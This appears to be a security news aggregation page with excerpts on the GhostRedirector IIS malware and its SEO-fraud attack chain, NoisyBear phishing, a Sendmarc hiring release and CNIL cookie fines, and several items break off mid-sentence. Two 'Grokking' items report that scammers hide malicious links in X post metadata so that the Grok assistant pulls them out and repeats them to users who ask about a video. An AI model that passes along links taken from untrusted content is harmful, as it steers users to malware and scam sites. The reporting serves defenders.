The threat actor known as NoisyBear has launched a sophisticated cyber-espionage effort called Operation BarrelFire, using specially designed phishing lures that imitate internal correspondence to target Kazakhstan’s energy sector, particularly workers of the state oil and gas major KazMunaiGas. Security researchers at Seqrite Labs first observed the campaign in April 2025 and noted its rapid […]
ESET security researchers have uncovered a sophisticated cyber threat campaign targeting Windows servers across multiple countries, with attackers deploying custom malware tools designed for both remote access and search engine manipulation. Cybersecurity experts at ESET have identified a previously unknown threat group dubbed GhostRedirector, which has successfully compromised at least 65 Windows servers primarily located in […]
Wilmington, United States, September4th, 2025, CyberNewsWire: Veteran email security leader to expand MSP and VAR partnerships and accelerate DMARC adoption. Sendmarc today announced the appointment of Rob Bowker as North American Region Lead. Bowker will oversee regional expansion with a focus on growing the Managed Service Provider (MSP) partner community, developing strategic Value-Added Reseller (VAR) […]
Wilmington, United States, September4th, 2025, CyberNewsWire: Veteran email security leader to expand MSP and VAR partnerships and accelerate DMARC adoption.
Sendmarc today announced the appointment of Rob Bowker as North American Region Lead.
Bowker will oversee regional expansion with a focus on growing the Managed Service Provider (MSP) partner community, developing strategic Value-Added Reseller (VAR) partnerships, and broadening the enterprise customer base.
Bowker brings more than two decades of experience in email infrastructure, deliverability, and security.
He has helped organizations implement and scale Domain-based Message Authentication, Reporting and Conformance (DMARC), Sender Policy Framework (SPF), and DomainKeys Identified Mail (DKIM) to protect email ecosystems and improve deliverability.
In his new role, Bowker will lead Sendmarc’s North American growth by forging partner-led routes to market and accelerating DMARC adoption across enterprise and mid-market organizations, while empowering MSPs with tools to protect small and medium-sized businesses (SMBs).
He will also expand the regional team to execute the company’s partner-first strategy.
“What excites me most about Sendmarc is our ability to pair an enterprise-class platform with a globally distributed team of experts. Customers don’t just get the best DMARC platform – they get support that spans time zones, cultures, and perspectives. I’m looking forward to helping Sendmarc accelerate growth across North America, working alongside MSPs, resellers, and enterprises to strengthen email security where it’s needed most,” said Bowker.
“Rob’s knowledge of the email and DMARC landscape and his ability to turn strategy into execution make him an invaluable leader for our North American operations,” said Jason Roos, Chief Sales Officer at Sendmarc.
“We’re excited to see the impact he’ll make as he continues building strong relationships with our partners and customers.”
About Sendmarc
Sendmarc is a global leader in safeguarding email communications through DMARC. Built with a partner-first approach, its platform empowers MSPs and VARs to deliver trusted protection against impersonation, phishing, and other email-based threats.
In addition to preventing fraud, Sendmarc improves email deliverability, ensuring legitimate business communications reach their intended recipients.
Trusted by partners worldwide, Sendmarc provides the tools and expertise needed to help customers achieve full DMARC compliance quickly and effectively.
A newly identified hacking group, dubbed “GhostRedirector” by cybersecurity researchers, has compromised at least 65 Windows servers across the globe, deploying custom malware designed to manipulate search engine results for financial gain.
According to a new report from ESET, the threat actor utilizes a malicious module for Microsoft’s Internet Information Services (IIS) to conduct a sophisticated SEO fraud scheme, primarily benefiting gambling websites.
The attacks, which have been active since at least August 2024, employ two previously undocumented custom tools: a passive C++ backdoor named “Rungan” and a malicious native IIS module called “Gamshen.”
While Rungan provides the attackers with the ability to execute commands on a compromised server, Gamshen is the core of the operation, designed to provide “SEO fraud as-a-service.”
GhostRedirector Hacks Windows Servers
Researchers explain that Gamshen functions by intercepting web traffic on the infected server. The module is specifically configured to activate only when it detects a request from Google’s web crawler, Googlebot.
For regular visitors, the website functions normally. However, when Googlebot scans the site, Gamshen modifies the server’s response, injecting data from its own command-and-control server.
GhostRedirector Hackers Compromise Windows Servers
This technique allows the attackers to create artificial backlinks and use other manipulative SEO tactics, effectively hijacking the compromised website’s reputation to boost the page ranking of a target website.
ESET believes the primary beneficiaries of this scheme are various gambling websites targeting Portuguese-speaking users. ESET researchers have attributed the campaign with medium confidence to a previously unknown, China-aligned threat actor.
This assessment is based on several factors, including the use of a code-signing certificate issued to a Chinese company, hardcoded Chinese language strings within the malware samples, and a password containing the Chinese word “huang” (yellow) used for rogue user accounts.
The victimology indicates an opportunistic approach rather than a targeted campaign against a specific industry.
Compromised servers span sectors such as healthcare, retail, transportation, education, and technology, with the majority located in Brazil, Thailand, and Vietnam.
Additional victims were identified in the United States, Peru, Canada, and parts of Europe and Asia.
GhostRedirector Hackers Compromise Windows Servers
GhostRedirector’s attack chain begins with what is believed to be an SQL injection vulnerability for initial access. Once inside, the attackers use PowerShell or CertUtil to download their arsenal from a staging server.
To gain full control, they employ publicly known privilege escalation exploits like “EfsPotato” and “BadPotato” to create new administrator-level user accounts on the server.
These rogue accounts provide persistent access, ensuring the attackers can maintain control even if their primary backdoors are discovered and removed.
The group’s toolkit also includes other custom utilities, such as “Zunput,” a tool that scans the server for active websites and drops multiple webshells to provide alternative methods of remote access.
The shared code libraries and infrastructure across these tools allowed ESET to cluster the activity and attribute it to a single group.
While the immediate impact on website visitors is minimal, participation in the SEO fraud scheme can severely damage the compromised host’s reputation by associating it with black-hat SEO tactics.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Armis Labs has uncovered ten critical security flaws collectively named “Frostbyte10” in Copeland’s E2 and E3 building management controllers. These devices, which handle refrigeration, HVAC, lighting, and other essential functions, could allow remote attackers to execute code, change settings, disable systems, or steal sensitive data. A firmware update is available now, and affected organizations are […]
A new cyber-attack, dubbed “Grokking,” is exploiting features on the social media platform X to spread malicious links on a massive scale.
Scammers are manipulating the platform’s advertising system and its generative AI, Grok, to bypass security measures and amplify harmful domains. This technique turns X’s own tools into unwilling accomplices in a widespread malvertising scheme.
According to GuardioSecurity researcher Nati Tal, the attack begins with malware promoting “video card” posts, which often use explicit or sensational “adult” content to lure users.
While X’s policies aim to combat malvertising by disallowing links in promoted content, these attackers have found a critical loophole.
The malicious link is not placed in the main body of the post but is instead embedded in the small “From:” field located beneath the video player.
X’s automated security scans seem to miss this area. As a result, posts can spread widely and get anywhere from 100,000 to over 5 million paid impressions.
The second stage of the attack leverages the platform’s AI assistant, Grok. Curious users, seeing the often anonymous and intriguing videos, frequently turn to Grok to ask for the source.
In its effort to provide a helpful answer, the AI scans the post for information and extracts the domain name from the “From:” field.
Grok then presents this malicious link directly to the user in its reply. For instance, when asked about a video’s origin, Grok has been observed responding with links to suspicious domains, Nati Tal said.
This process effectively “Grokks” the malicious link, not only delivering it to inquisitive users but also amplifying its visibility and perceived legitimacy.
By having the platform’s own AI reference the domain, the scammers may benefit from enhanced SEO and a strengthened reputation for their harmful sites, making them seem more trustworthy to unsuspecting users.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Microsoft has officially acknowledged a significant User Account Control (UAC) bug that is causing widespread installation issues across Windows 10 and Windows 11 systems. The problem stems from a security update released in August 2025 and affects millions of users attempting to install or repair applications. The Core Issue The bug emerged following Microsoft’s August 2025 […]
Cybersecurity researchers have flagged a new technique that cybercriminals have adopted to bypass social media platform X’s malvertising protections and propagate malicious links using its artificial intelligence (AI) assistant Grok.
The findings were highlighted by Nati Tal, head of Guardio Labs, in a series of posts on X. The technique has been codenamed Grokking.
The approach is designed to
The French data protection authority has fined Google and Chinese e-commerce giant Shein $379 million (€325 million) and $175 million (€150 million), respectively, for violating cookie rules.
Both companies set advertising cookies on users’ browsers without securing their consent, the National Commission on Informatics and Liberty (CNIL) said. Shein has since updated its systems to comply with
